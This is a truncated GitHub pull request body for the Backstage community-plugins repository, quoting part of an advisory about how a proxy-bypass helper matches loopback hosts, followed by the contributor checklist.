const LOOPBACK_ADDRESSES = new Set(['localhost', '127.0.0.1', '::1']);
const isLoopback = (host) => LOOPBACK_ADDRESSES.has(host);
```
This hardcoded `Set` is subsequently used at line 108 during the final NO_PROXY match evaluation:

```
// lib/helpers/shouldBypassProxy.js — Line 108 (VULNERABLE USAGE)
return hostname =

> ✂ **Note**
> 
> PR body was truncated to here.

#### :heavy_check_mark: Checklist

- [x] A changeset describing the change and affected packages. ([more info](https://github.com/backstage/community-plugins/blob/master/CONTRIBUTING.md#creating-changesets))
- [ ] Added or updated documentation
- [ ] Tests for new functionality and regression tests for bug fixes
- [ ] Screenshots attached (for UI changes)
- [x] All your commits have a `Signed-off-by` line in the message. ([more info](https://github.com/backstage/community-plugins/blob/master/CONTRIBUTING.md#developer-certificate-of-origin))
